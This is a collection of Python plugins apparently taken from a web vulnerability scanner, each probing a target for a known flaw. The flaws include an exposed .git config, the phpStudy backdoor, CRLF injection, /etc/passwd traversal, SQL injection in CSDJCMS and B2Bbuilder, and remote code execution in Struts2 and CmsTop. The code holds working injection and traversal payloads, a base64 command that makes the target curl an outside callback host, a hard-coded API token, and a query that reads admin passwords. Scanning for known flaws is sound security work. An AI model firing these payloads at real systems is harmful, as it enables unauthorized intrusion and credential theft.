                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            # NOTE: verify=False turns off TLS certificate validation.
            if ProxyIp == None:
                resp = requests.get(payload_url,
                                    headers=request_headers,
                                    timeout=5,
                                    verify=False)
            else:
                # A proxy address must be prefixed with http:// or https://.
                # Only the "http" key is set here.
                proxies = {"http": "http://" + str(ProxyIp)}
                resp = requests.get(payload_url,
                                    headers=request_headers,
                                    proxies=proxies,
                                    timeout=5,
                                    verify=False)
            if '81dc9bdb52d04dc20036dbd8313ed055' not in resp.text.lower():
                continue
            Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            Medusas.append(str(Medusa))
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
    except:
        logging.warning(Url)
        _ = VulnerabilityInfo('')
        logging.warning(_.info.get('parameter'))
    summary = VulnerabilityInfo(Medusas)
    return (summary.info)
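def medusa(Url, RandomAgent, ProxyIp):
    """Check whether ``/.git/config`` is served on any of the ports in ``list``.

    ``list`` and ``ReturnList`` are module-level names defined outside this
    function (``list`` shadows the builtin and is used as a list of port
    strings). A port given in ``Url`` is appended to ``list`` if it is not
    there yet. A 200 response whose lower-cased body contains
    ``repositoryformatversion`` is reported as high severity and added to
    ``ReturnList``. Returns the ``info`` of a ``VulnerabilityInfo`` built from
    ``ReturnList``. Errors are logged as warnings per port.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        if str(port) not in list:
            list.append(str(port))  # a port given by the user joins the ports scanned below
    global resp
    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    for payload in list:
        # The scheme is part of the URL. It used to be left out, and requests
        # rejects a URL of the form "host:port/path", so every probe raised
        # and only produced a warning.
        PayloadUrl = scheme + "://" + url + ':' + payload + '/.git/config'
        try:
            s = requests.session()
            # NOTE: verify=False turns off TLS certificate validation.
            if ProxyIp != None:
                proxies = {
                    # a proxy address must be prefixed with http:// or https://
                    "http": "http://" + str(ProxyIp)
                }
                resp = s.get(PayloadUrl,
                             headers=headers,
                             proxies=proxies,
                             timeout=5,
                             verify=False)
            elif ProxyIp == None:
                resp = s.get(PayloadUrl,
                             headers=headers,
                             timeout=5,
                             verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and con.lower().find(
                    'repositoryformatversion') != -1:
                Medusa = "{} \r\n漏洞详情:{}\r\n".format(url, PayloadUrl)
                ReturnList.append(Medusa)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
        except:
            logging.warning(Url)
            _ = VulnerabilityInfo('')
            logging.warning(_.info.get('parameter'))
    _t = VulnerabilityInfo(ReturnList)
    return (_t.info)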
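def medusa(Url,RandomAgent,ProxyIp):
    """Send a base64-encoded command in ``accept-charset`` and confirm it out of band.

    The command makes the target resolve a host name that embeds the target
    and a random number. After a five-second wait, the DNS records of the
    callback service are fetched; if they contain that name, a high-severity
    finding is reported and its ``info`` returned. ``payload`` is defined
    outside this function. In every other case the result is ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    global resp
    global resp2
    Random = str(random.randint(666, 666666))
    commandS = ('''system("curl http://{}_phpStudy_backdoor_{}.7ktb2x.ceye.io");''').format(url, Random)
    cmd = base64.b64encode(commandS.encode('utf-8'))
    try:
        # NOTE(review): the port parsed above is not part of this URL, so a
        # non-default port appears to be ignored; confirm against ``payload``.
        payload_url = scheme+"://"+url+payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        s = requests.session()
        # NOTE: verify=False turns off TLS certificate validation.
        if ProxyIp!=None:
            proxies = {
                # a proxy address must be prefixed with http:// or https://
                "http": "http://" + str(ProxyIp)
            }
            resp = s.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
        elif ProxyIp==None:
            resp = s.get(payload_url,headers=headers, timeout=5, verify=False)
        time.sleep(5)  # give the DNS callback time to be recorded
        # NOTE(review): this API token is hard-coded and shared by everyone who
        # runs the file, and the lookup goes over plain http. Load the token
        # from configuration and treat the committed value as exposed.
        ceyeurl = 'http://api.ceye.io/v1/records?token=f84734983a259c598a1edeb772981d14&type=dns&filter='
        try:
            # Decoded text, not .content: a str-in-bytes test raises TypeError
            # on Python 3, which the handler below turned into a warning, so a
            # recorded callback was never reported.
            ceye_content = requests.get(ceyeurl, timeout=5).text
            if "{}_phpStudy_backdoor_{}".format(url, Random) in ceye_content:
                Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\nHeader\r\n{}".format(url, payload_url,headers)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
                return (_t.info)
        except:
            logging.warning(Url)
            _ = VulnerabilityInfo('')
            logging.warning(_.info.get('parameter'))
    except Exception as e:
        # Request failures are ignored on purpose (best effort).
        pass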
def OpenProxy():
    """Return the first entry of the on-disk proxy pool that passes a test request.

    Reads ``/ScanResult/ProxyPool.txt`` one entry per line. Before reading,
    the file is deleted when its timestamp falls in a different year or
    month than today, or when the day-of-month values differ by 3 or more.
    Each entry is then tried with a 2-second GET and the first one that
    answers with status 200 is returned.

    Returns ``None`` when two consecutive lines are identical, when the file
    is read to the end without a working entry, or after the fallback in the
    outer ``except`` has run.

    NOTE(review): the outer ``except`` refills the pool and calls
    ``OpenProxy()`` again, but the value returned by that inner call is
    discarded, and ``RepeatCleaningAgent`` is set back to 1 on every entry,
    so the ``== 1`` test does not bound the recursion. Confirm the intended
    behaviour.
    """
    global RepeatCleaningAgent
    RepeatCleaningAgent = 1  # flag: the pool has just been crawled and cleaned
    ProxyIpComparison = ""
    try:  # try to open the pool file; failure means there is no pool yet
        with open("/ScanResult/ProxyPool.txt", encoding='utf-8') as f:
            try:
                # getctime is the creation time on Windows but the last
                # metadata change on Unix, so "age" is platform dependent.
                FileCreationYime = time.localtime(
                    os.path.getctime("/ScanResult/ProxyPool.txt"))  # file timestamp
                CurrentTime = time.localtime(time.time())  # current time
                if FileCreationYime.tm_year == CurrentTime.tm_year:  # same year?
                    if CurrentTime.tm_mon == FileCreationYime.tm_mon:  # same month?
                        a = FileCreationYime.tm_mday
                        b = CurrentTime.tm_mday
                        c = abs(a - b)  # difference in day-of-month
                        if c >= 3:  # 3 or more days apart: drop the pool
                            f.close()  # close the handle before deleting the file
                            os.remove("/ScanResult/ProxyPool.txt")
                    else:
                        f.close()
                        os.remove("/ScanResult/ProxyPool.txt")
                else:
                    f.close()
                    os.remove("/ScanResult/ProxyPool.txt")
            except:
                # Any error in the age check is ignored and the file is read as-is.
                pass
            # NOTE(review): when the branch above closed and removed the file,
            # iterating the closed handle raises, which lands in the outer
            # except and triggers the re-crawl path.
            for ProxyPool in f:  # test each stored proxy in turn

                ProxyIps = ProxyPool[:-1]  # drop the trailing newline (always removes the last character)
                # Same entry as the previous line: treated as "nothing in the
                # pool works", so give up and run without a proxy.
                if ProxyIps == ProxyIpComparison:
                    return
                ProxyIpComparison = ProxyPool[:-1]
                proxies = {
                    # the scheme prefix (http:// or https://) is required in the proxy URL
                    "http": "http://" + str(ProxyIps)
                }
                # NOTE(review): the mapping only has an "http" entry while the
                # test URL is https; requests selects the proxy by URL scheme,
                # so this request presumably does not pass through the
                # candidate at all - confirm.
                try:
                    if requests.get('https://www.baidu.com/',
                                    proxies=proxies,
                                    timeout=2).status_code == 200:
                        return ProxyIps  # entry passed the second-stage check
                except:
                    # Unreachable or failing entry: move on to the next line.
                    pass
    except:
        # Bare except: reached for a missing pool file and for any other error
        # raised above.
        if RepeatCleaningAgent == 1:
            HttpProxy = ClassCongregation.Proxy()
            HttpProxy.HttpIpProxy()  # no usable file: run the proxy crawler
            OpenProxy()  # then call this function again
        else:
            pass
        RepeatCleaningAgent = 0  # reset the module-level flag
def medusa(Url, RandomAgent, ProxyIp):
    """Send one probe request and report a finding from the reply headers.

    The request is a GET to the target plus the module-level ``Payload``
    path, with redirects not followed. A finding is raised when the reply is
    a 302 and the header stored under the carriage-return-prefixed
    ``Set-Cookie`` key contains ``a=1``.

    NOTE(review): the header key and the ``a=1`` marker look like a
    header-injection (CRLF) check, but ``Payload`` is defined outside this
    block - confirm.

    Args:
        Url: target URL, split by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: ``host:port`` of an HTTP proxy, or ``None`` for a direct
            request.

    Returns:
        The ``info`` of the recorded finding on a hit, otherwise ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # No explicit port in the URL: use the scheme's well-known one.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    authority = url + ':' + str(port)
    PayloadUrl = scheme + "://" + authority + Payload
    headers = {
        'Host': authority,
        'Accept-Encoding': 'gzip, deflate',
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language':
        'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
    }
    session = requests.session()
    try:
        request_args = {
            'headers': headers,
            'timeout': 5,
            'allow_redirects': False,
        }
        if ProxyIp is not None:
            # The proxy URL needs its scheme prefix.
            request_args['proxies'] = {"http": "http://" + str(ProxyIp)}
        resp = session.get(PayloadUrl, **request_args)

        # Indexing raises KeyError when the header is absent; that ends up in
        # the handler below and is logged as a warning, not as a finding.
        cookie_value = resp.headers['\rSet-Cookie']
        status = resp.status_code
        if status == 302 and 'a=1' in cookie_value.lower():
            Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, PayloadUrl)
            finding = VulnerabilityInfo(Medusa)
            report = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity levels: serious, High, Intermediate, Low.
            report.High()
            return finding.info
    except:
        # Bare except: every failure (network error, missing header, ...) is
        # reduced to two warning lines, so a failed probe and a clean target
        # look the same to the caller.
        logging.warning(Url)
        plugin_meta = VulnerabilityInfo('')
        logging.warning(plugin_meta.info.get('parameter'))
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for an arbitrary-file-read condition and record a hit.

    Requests ``/robots`` with the traversal string carried in the ``Accept``
    header. A 200 reply whose body contains all of ``root:``, ``bin:``,
    ``sys:`` and ``sync:`` is recorded as a finding.

    The recorded text embeds the returned body, so the stored result holds
    whatever file content the target disclosed and should be handled as
    sensitive data. TLS certificate validation is disabled for the request
    (``verify=False``), so the peer's identity is not checked.

    Args:
        Url: target URL, split by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        UnixTimestamp: passed through to ``VulnerabilityDetails``.

    Returns:
        ``None``; results and errors are written through ``ClassCongregation``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # No explicit port in the URL: use the scheme's well-known one.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "../../../../../../../../etc/passwd{{"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + "/robots"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': payload,
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }

        session = requests.session()
        resp = session.get(payload_url, headers=headers, timeout=5, verify=False)
        body = resp.text
        status = resp.status_code
        # All four account-file markers must be present to count as a hit.
        markers = ('root:', 'bin:', 'sys:', 'sync:')
        if status == 200 and all(marker in body for marker in markers):
            Medusa = "{} 存在任意文件读取漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, body.encode(encoding='utf-8'))
            finding = VulnerabilityInfo(Medusa)
            # Store the finding keyed by target and scan timestamp.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, UnixTimestamp).Write()
            # Also write it to the per-target result file (named after url).
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Record which plugin failed against which target.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, ProxyIp):
    """Check whether the 5clib registration action is reachable without login.

    Fetches ``/5clib/Inuseraction.action?actionkind=reg`` and records a
    high-severity finding when the reply is a 200 whose body contains both
    ``isIdCards()`` and ``addressprompt``.

    The finding text includes the full response body. TLS certificate
    validation is disabled for the request (``verify=False``).

    Args:
        Url: target URL, split by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: accepted for interface compatibility; not used in this block.

    Returns:
        ``None``; results and errors are written through ``ClassCongregation``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # No explicit port in the URL: use the scheme's well-known one.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/5clib/Inuseraction.action?actionkind=reg"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        resp = session.get(payload_url, headers=headers, timeout=6, verify=False)
        body = resp.text
        status = resp.status_code
        # Both page markers must be present on a 200 reply.
        if status == 200 and 'isIdCards()' in body and 'addressprompt' in body:
            Medusa = "{}存在五车图书管理系统存在越权添加管理员漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            report = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity levels: serious, High, Intermediate, Low.
            report.High()
            # Write the finding to the per-target result file (named after url).
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        # Log the target together with the name of the plugin that failed.
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, plugin_name)
Example #25
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check one target for the file-download condition and record a hit.

    Requests the target plus the module-level ``payload`` path. A 200 reply
    whose body matches ``No error in <b>...</b>`` is recorded as a finding.

    TLS certificate validation is disabled for the request
    (``verify=False``).

    Args:
        Url: target URL, split by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy setting, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded unchanged to ``VulnerabilityDetails``.

    Returns:
        ``None``; results and errors are written through ``ClassCongregation``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # No explicit port in the URL: use the scheme's well-known one.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        base = scheme + "://" + url + ':' + str(port)
        payload_url = base + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(
            payload_url,
            headers=headers,
            proxies=proxies,
            timeout=5,
            verify=False,
        )
        body = resp.text
        status = resp.status_code
        # The marker is only looked for on a 200 reply.
        if status == 200 and re.search(r'No error in <b>([^<]+)</b>', body):
            Medusa = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            finding = VulnerabilityInfo(Medusa)
            # Store the finding for this target.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, **kwargs).Write()
            # Also write it to the per-target result file (named after url).
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Record which plugin failed against which target.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
Example #26
def medusa(Url, RandomAgent, ProxyIp):
    """Check the CSDJCMS login endpoint for an error-based SQL injection.

    Posts a crafted ``username`` field to ``/index.php/open/bang`` and
    records a high-severity finding when the reply body contains the
    duplicate-key error text ``for key 'group_key'``. The status code is not
    checked.

    The finding text includes the full response body, which on a hit carries
    database error output. TLS certificate validation is disabled for the
    request (``verify=False``).

    Args:
        Url: target URL, split by ``ClassCongregation.UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: accepted for interface compatibility; not used in this block.

    Returns:
        ``None``; results and errors are written through ``ClassCongregation``.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        # No explicit port in the URL: use the scheme's well-known one.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/index.php/open/bang"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        data = "openid=x&denglu=login&username=a%27 and(select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#&userpass=testvul"
        session = requests.session()
        resp = session.post(
            payload_url,
            headers=headers,
            data=data,
            timeout=6,
            verify=False,
        )
        body = resp.text
        # The database's duplicate-entry error is the only signal used.
        if "for key 'group_key'" in body:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            report = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity levels: serious, High, Intermediate, Low.
            report.High()
            # Write the finding to the per-target result file (named after url).
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        # Log the target together with the name of the plugin that failed.
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, plugin_name)
Example #27
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check one target for the Struts2 code-execution condition on /user.action.

    Posts the module-level ``payload`` to ``/user.action`` and records a
    finding when the reply is a 200 whose lower-cased body contains ``uid``,
    ``gid`` and ``groups``.

    The ``Content-Length`` header is fixed at ``571``; it presumably matches
    the length of ``payload``, which is defined outside this block - confirm.
    TLS certificate validation is disabled for the request
    (``verify=False``).

    Args:
        Url: target URL, split by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy setting, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded unchanged to ``VulnerabilityDetails``.

    Returns:
        ``None``; results and errors are written through ``ClassCongregation``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # No explicit port in the URL: use the scheme's well-known one.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    authority = url + ':' + str(port)
    payload_url = scheme + "://" + authority + '/user.action'
    headers = {
        'Host': authority,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '571',
        'DNT': '1',
        'Referer': payload_url,
        'Upgrade-Insecure-Requests': '1',
    }

    try:
        resp = requests.post(
            payload_url,
            data=payload,
            headers=headers,
            proxies=proxies,
            timeout=5,
            verify=False,
        )
        body = resp.text
        status = resp.status_code
        # All three tokens must appear (case-insensitively) on a 200 reply.
        tokens = ('uid', 'gid', 'groups')
        if status == 200 and all(token in body.lower() for token in tokens):
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:2_0_0-2_2_3\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url, payload)
            finding = VulnerabilityInfo(Medusa)
            # Store the finding for this target.
            ClassCongregation.VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # Also write it to the per-target result file (named after url).
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Record the plugin name, the target and the exception.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
def medusa(Url, RandomAgent, ProxyIp):
    """Check the B2Bbuilder comment endpoint for an error-based SQL injection.

    Requests ``/comment.php`` with a crafted ``conid`` parameter and records
    a high-severity finding when the reply is a 200 whose body contains the
    fixed 32-character hex marker.

    NOTE(review): the marker is presumably the MD5 digest produced by the
    ``md5(c)`` term of the query - confirm.

    The query also selects the ``password`` column of ``b2bbuilder_admin``,
    and the finding text includes the full response body, so a stored result
    may hold credential material from the target and should be handled as
    sensitive data. TLS certificate validation is disabled for the request
    (``verify=False``).

    Args:
        Url: target URL, split by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: accepted for interface compatibility; not used in this block.

    Returns:
        ``None``; results and errors are written through ``ClassCongregation``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # No explicit port in the URL: use the scheme's well-known one.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(md5(c),0x3A,password)%20from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload

        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        resp = session.get(payload_url, headers=headers, timeout=6, verify=False)
        body = resp.text
        status = resp.status_code
        if status == 200 and "4a8a08f09d37b73795649038408b5f33" in body:
            Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            report = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity levels: serious, High, Intermediate, Low.
            report.High()
            # Write the finding to the per-target result file (named after url).
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        # Log the target together with the name of the plugin that failed.
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, ProxyIp):
    """Check B2Bbuilder for SQL injection through the X-Forwarded-For header.

    Requests ``/index.php`` with a crafted ``X-Forwarded-For`` value and
    records a high-severity finding when the reply is a 200 whose body
    contains the fixed 33-character marker.

    NOTE(review): the marker is presumably the digest from the query's
    ``md5(3.14)`` term followed by the digit appended by
    ``floor(rand(0)*2)`` - confirm.

    The finding text includes the full response body. TLS certificate
    validation is disabled for the request (``verify=False``).

    Args:
        Url: target URL, split by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: accepted for interface compatibility; not used in this block.

    Returns:
        ``str`` of the recorded finding's ``info`` on a hit, otherwise
        ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # No explicit port in the URL: use the scheme's well-known one.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/index.php"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload

        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "X-Forwarded-For":
            "1.1.1.1',(select 1 from (select count(*),concat((Select concat(md5(3.14))),floor(rand(0)*2))x from information_schema.tables group by x)a),1,1)#",
        }

        session = requests.session()
        resp = session.get(payload_url, headers=headers, timeout=6, verify=False)
        body = resp.text
        status = resp.status_code
        if status == 200 and "4beed3b9c4a886067de0e3a094246f781" in body:
            Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, resp.text)
            finding = VulnerabilityInfo(Medusa)
            report = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity levels: serious, High, Intermediate, Low.
            report.High()
            return str(finding.info)
    except Exception:
        # Log the target together with the name of the plugin that failed.
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url,RandomAgent,ProxyIp):
    """Probe two candidate URLs for the CmsTop search-endpoint code-execution condition.

    Builds one URL under ``/app/`` on the target host and a second one on a
    host derived from the target's name, requests each, and records a
    high-severity finding when a reply is a 200 whose body contains both
    ``PHP Version`` and ``Configure Command``.

    The finding text includes the full response body, which on a hit is the
    target's PHP configuration page. TLS certificate validation is disabled
    for the requests (``verify=False``). ``ProxyIp`` is accepted but not used
    in the visible lines.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # No explicit port in the URL: use the scheme's well-known one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    payloadurl = scheme + "://" + url + ":" + str(port) + payload
    payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    # Everything after the first dot-separated label of the host name.
    domain_name = ".".join(url.split(".")[1:])
    # NOTE(review): "app" is concatenated directly with domain_name; no "."
    # is inserted between them - confirm this is the intended host.
    payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2
    Payloads = [payloadurl,payloadurl2]
    Medusas = []  # holds returned data; not used in the visible lines

    for payload_url in Payloads:
        try:
            headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }
            s = requests.session()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            # Both phpinfo page markers must be present on a 200 reply.
            if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 :
                Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
                _t=VulnerabilityInfo(Medusa)
                web=ClassCongregation.VulnerabilityDetails(_t.info)
                web.High() # severity levels: serious, High, Intermediate, Low
                ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to the result file; url names the file, Medusa is the content

        except Exception:
            # A failure on one candidate URL is logged and the loop continues.
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # log the target URL and the failing plugin name